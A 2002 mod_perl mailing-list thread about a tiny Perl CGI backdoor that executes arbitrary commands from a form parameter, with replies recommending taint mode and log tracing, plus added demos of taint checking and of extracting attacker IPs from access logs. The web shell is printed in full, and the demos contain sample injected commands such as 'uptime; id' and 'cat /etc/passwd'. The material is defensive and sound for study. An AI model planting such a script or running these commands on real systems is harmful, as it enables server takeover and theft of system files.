>> Chris Reinhardt wrote:
>>
>>> On Thu, 21 Mar 2002, John Michael wrote:
>>>
>>>> #!/usr/bin/perl
>>>> use CGI qw(:standard);
>>>> print header;
>>>> my $k=param("g");
>>>> my $a=param("s");
>>>> if ($a || $k) {
>>>>   $l=`$k 2>&1`;
>>>>   print start_form,textarea("g",$k,1,50);
>>>>   print submit("sc");
>>>>   print end_form;
>>>>   print pre($l);
>>>> }
>>>> print $ENV{"SERVER_NAME"};
>>>
>>> It executes arbitrary commands as <whatever your httpds run as>.
>>
>> Don't delete it, but add the -T flag:
>>
>> #!/usr/bin/perl -T
>>
>> In addition to the hacker not being able to run anything and probably
>> not understanding why, you will be able to check the logs to see what IP
>> the script was called from and hopefully trace down the bugger.
Of course, as Tom Brown has whispered in my ear, you simply need to run your code with PerlTaintCheck On, without modifying the script, or taking it off, depending on what you want to achieve.

_____________________________________________________________________
Stas Bekman             JAm_pH -- Just Another mod_perl Hacker
http://stason.org/      mod_perl Guide http://perl.apache.org/guide
mailto:[EMAIL PROTECTED]  http://ticketmaster.com http://apacheweek.com
http://singlesheaven.com http://perl.apache.org http://perlmonth.com/
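To make the taint-mode point concrete, here is an added example (not code from the thread, and not a mod_perl handler) that does what the posted script does with its input, once under Perl's -T switch with no untainting, and once with a hypothetical allow-list untaint. Stand-alone it takes the command from @ARGV rather than CGI::param, but under -T both are tainted in exactly the same way, so the backtick fails for the same reason it would fail in the CGI. The allow-listed subcommand names are an assumption for the demonstration; the script is a plain CGI, so the switch can go on the shebang line, while under mod_perl the shebang switches are not what enables taint checking, which is why the reply above points at PerlTaintCheck On instead.

```perl
#!/usr/bin/perl -T
# Added example, not from the mailing-list thread: what -T does to the
# backtick in the posted script.  Input comes from @ARGV here instead of
# CGI::param, but both are tainted under -T.
use strict;
use warnings;
use Scalar::Util qw(tainted);

# Taint mode also refuses to run external commands while %ENV is
# attacker-influenced, so clean the environment first; otherwise the
# failure would be "Insecure $ENV{PATH}" rather than the tainted command.
$ENV{PATH} = '/bin:/usr/bin';
delete @ENV{qw(IFS CDPATH ENV BASH_ENV)};

# Hypothetical allow-list (an assumption for this example): the only
# subcommands this script is permitted to run.
my %allowed = map { $_ => 1 } qw(date uptime hostname);

# Run $cmd exactly the way the posted script does, but catch the taint
# failure and report it instead of letting the script die.
sub run_raw {
    my ($cmd) = @_;
    my $out = eval { `$cmd 2>&1` };
    return defined $out ? "ran: $out" : "refused: $@";
}

# Untainting: the only way to clear taint is to pull the value out of a
# regex capture, and the pattern has to be strict enough to be worth it.
# Here the value must be a single lowercase word on the allow-list.
sub untaint_cmd {
    my ($cmd) = @_;
    return unless $cmd =~ /\A([a-z]{1,16})\z/ && $allowed{$1};
    return $1;    # a capture is untainted
}

sub run_checked {
    my ($cmd) = @_;
    my $safe = untaint_cmd($cmd);
    return "rejected: not a single allow-listed command" unless defined $safe;
    my $out = `$safe 2>&1`;    # $safe and the literal suffix are both clean
    return "ran: $out";
}

my $k = @ARGV ? shift @ARGV : die "usage: $0 COMMAND\n";   # param("g") in the CGI

printf "input %s tainted\n", tainted($k) ? 'is' : 'is not';
print "raw:     ", run_raw($k),     "\n";
print "checked: ", run_checked($k), "\n";
```

Run it as `perl -T script.pl 'uptime; id'`: the raw call is refused with Perl's "Insecure dependency in `` while running with -T switch" message, which is the behaviour the reply above relies on to neutralise the backdoor without deleting it, and the checked call rejects the input because `uptime; id` is not a single allow-listed word. With `perl -T script.pl uptime` the raw call still fails (the data is tainted no matter how harmless it looks) and only the checked call runs. Note that -T is all-or-nothing for the data: a script that untaints with a permissive pattern such as `/(.*)/` gets the backdoor back.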
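The second half of the advice above, finding out which addresses called the script, is also worth showing. The following is an added example, not part of the thread: it reads Apache combined-format access-log lines, keeps the requests for the backdoor script, and decodes the command that was passed in the `g` or `s` query parameter (the parameter names the posted script reads). The log lines and the script path /cgi-bin/x.cgi are constructed for this example; the real file name was not given on the list.

```perl
#!/usr/bin/perl
# Added example, not from the mailing-list thread: pull the callers of the
# backdoor CGI out of an Apache access log.  The log lines below are
# constructed and /cgi-bin/x.cgi is a hypothetical stand-in for the real
# script name.
use strict;
use warnings;

my @log = (
    '203.0.113.7 - - [21/Mar/2002:03:14:07 -0500] "GET /cgi-bin/x.cgi?g=id HTTP/1.0" 200 312 "-" "Mozilla/4.0"',
    '198.51.100.23 - - [21/Mar/2002:09:02:11 -0500] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [21/Mar/2002:03:15:40 -0500] "GET /cgi-bin/x.cgi?g=cat%20%2Fetc%2Fpasswd HTTP/1.0" 200 2210 "-" "Mozilla/4.0"',
    '203.0.113.7 - - [21/Mar/2002:03:16:02 -0500] "POST /cgi-bin/x.cgi HTTP/1.0" 200 390 "-" "Mozilla/4.0"',
);

my $script = '/cgi-bin/x.cgi';

# Minimal application/x-www-form-urlencoded decoding for the query string.
sub url_decode {
    my ($s) = @_;
    $s =~ tr/+/ /;
    $s =~ s/%([0-9A-Fa-f]{2})/chr hex $1/ge;
    return $s;
}

# One record per request for $script: source IP, timestamp, method, and
# the command if it was passed in the query string.  A POST carries the
# command in the body, which the access log does not record, so those
# hits are listed without a command rather than dropped.
sub backdoor_hits {
    my ($script, @lines) = @_;
    my @hits;
    for my $line (@lines) {
        my ($ip, $ts, $method, $path) =
            $line =~ /^(\S+) \S+ \S+ \[([^\]]+)\] "(\w+) (\S+)/ or next;
        my ($file, $qs) = split /\?/, $path, 2;
        next unless $file eq $script;
        my $cmd = '(not in query string)';
        if (defined $qs) {
            for my $pair (split /&/, $qs) {
                my ($name, $value) = split /=/, $pair, 2;
                $cmd = url_decode($value // '') if $name eq 'g' || $name eq 's';
            }
        }
        push @hits, { ip => $ip, time => $ts, method => $method, cmd => $cmd };
    }
    return @hits;
}

my @hits = backdoor_hits($script, @log);
for my $h (@hits) {
    printf "%-15s %s %-4s %s\n", @{$h}{qw(ip time method cmd)};
}

# Distinct source addresses, busiest first: what you take to the abuse desk.
my %count;
$count{ $_->{ip} }++ for @hits;
print "\nsources: ",
    join(', ', map { "$_ ($count{$_})" } sort { $count{$b} <=> $count{$a} } keys %count),
    "\n";
```

On a real server replace the constructed `@log` with the lines of the access log (for instance `my @log = <STDIN>;` and pipe the file in), and remember that the source address only identifies the last hop: an attacker coming through a proxy or a previously compromised host will show up as that host, which is why the reply above says "hopefully" trace them down.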